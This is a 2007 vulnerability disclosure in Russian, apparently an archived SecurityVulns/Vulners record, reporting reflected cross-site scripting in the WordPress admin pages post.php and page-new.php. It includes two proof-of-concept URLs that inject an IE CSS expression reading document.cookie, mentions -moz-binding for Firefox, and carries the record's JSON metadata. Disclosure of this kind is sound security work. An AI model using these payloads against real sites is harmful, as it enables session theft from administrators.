Description
Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WordPress.
XSS:
http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
Это примеры для Internet Explorer. Для исполнения кода в Mozilla и Firefox может быть использован "-moz-binding".
Уязвимы версии WordPress <= 2.0.9. Версия WP 2.0.11 неуязвима.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1658/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
{"id": "SECURITYVULNS:DOC:18714", "bulletinFamily": "software", "title": "Cross-Site Scripting vulnerabilities in WordPress", "description": "\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435 3APA3A!\r\n\r\n\u0421\u043e\u043e\u0431\u0449\u0430\u044e \u0432\u0430\u043c \u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u043c\u043d\u043e\u044e Cross-Site Scripting \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 WordPress.\r\n\r\nXSS:\r\n\r\nhttp://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22\r\n\r\nhttp://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22\r\n\r\n\u042d\u0442\u043e \u043f\u0440\u0438\u043c\u0435\u0440\u044b \u0434\u043b\u044f Internet Explorer. \u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 Mozilla \u0438 Firefox \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d "-moz-binding".\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b \u0432\u0435\u0440\u0441\u0438\u0438 WordPress <= 2.0.9. \u0412\u0435\u0440\u0441\u0438\u044f WP 2.0.11 \u043d\u0435\u0443\u044f\u0437\u0432\u0438\u043c\u0430.\r\n\r\n\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0443 \u043c\u0435\u043d\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435:\r\nhttp://websecurity.com.ua/1658/\r\n\r\nBest wishes & regards,\r\nMustLive\r\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0441\u0430\u0439\u0442\u0430\r\nhttp://websecurity.com.ua", "published": "2007-12-24T00:00:00", "modified": "2007-12-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18714", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:24", "edition": 1, "viewCount": 1477, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8482"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8482"]}]}, "exploitation": null, "vulnersScore": -0.0}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645636376, "score": 1659803227}, "_internal": {"score_hash": "10a6b9e03d0628482dce17b08738fe82"}}
{}